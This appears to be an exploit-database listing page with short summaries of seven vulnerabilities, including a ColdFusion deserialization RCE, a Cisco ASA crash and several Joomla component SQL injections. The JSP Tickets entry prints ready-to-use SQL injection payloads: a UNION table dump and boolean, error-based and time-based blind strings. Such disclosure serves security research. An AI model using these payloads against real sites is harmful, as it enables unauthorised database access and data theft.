header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

Adobe Coldfusion BlazeDS Java Object Deserialization RCE

This is a two-stage deserialization exploit. The code below is the first stage. You will need a JRMPListener (ysoserial) listening at callback_IP:callback_port. After firing this exploit, and once the target server connects back, JRMPListener will deliver the secondary payload for RCE.

Cisco ASA CVE-2018-0101 Crash PoC

This PoC exploits a vulnerability in Cisco ASA devices that allows an attacker to crash the device by sending a specially crafted XML packet. The vulnerability is caused by a buffer overflow in the webvpn code. The vulnerability affects Cisco ASA devices running versions 9.7.1 and earlier. The PoC sends an XML packet with a specially crafted 'host-scan-reply' element that causes a buffer overflow and crashes the device.

Netis-WF2419 HTML Injection

Netis-WF2419 is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data. Attacker-supplied HTML or script code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible.

Bochs 2.6-5 – Remote Code Execution

An attacker could exploit this vulnerability to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition. The vulnerability is caused due to a boundary error when handling user-supplied data, which can result in a buffer overflow. By sending a specially crafted request, an attacker could overflow a buffer and execute arbitrary code.

Joomla! Component JSP Tickets 1.1 – SQL Injection

The vulnerability allows an attacker to inject sql commands. Proof of Concept: 1) http://localhost/[PATH]/index.php?option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=[SQL] -66' /*!07777UNION*/ /*!07777SELECT*/ nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,/*!07777CONCAT*/((/*!07777SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+/*!07777FROM*/+INFORMATION_SCHEMA.TABLES+/*!07777WHERE*/+TABLE_SCHEMA=DATABASE())),nUlL,nUlL,nUlL,nUlL--+VerAyari Parameter: ticketcode (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND 5298=5298 AND 'okLe'='okLe Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND (SELECT 8072 FROM(SELECT COUNT(*),CONCAT(0x717a6a7871,(SELECT (ELT(8072=8072,1))),0x717a706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'FwvD'='FwvD Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND SLEEP(5) AND 'VXyV'='VXyV

Joomla! Component Zh GoogleMap 8.4.0.0 – SQL Injection

The vulnerability allows an attacker to inject sql commands into the vulnerable application. The attacker can send a specially crafted request to the vulnerable application in order to execute arbitrary sql commands in the back-end database. This can lead to the manipulation or disclosure of data.

Joomla! Component Zh YandexMap 6.2.1.0 – SQL Injection

The vulnerability allows an attacker to inject sql commands by sending a maliciously crafted request to the vulnerable application. The attacker can send a specially crafted request to the vulnerable application in order to execute arbitrary SQL commands in application's database. This can lead to information disclosure, data manipulation, and even system compromise.

Recent Exploits: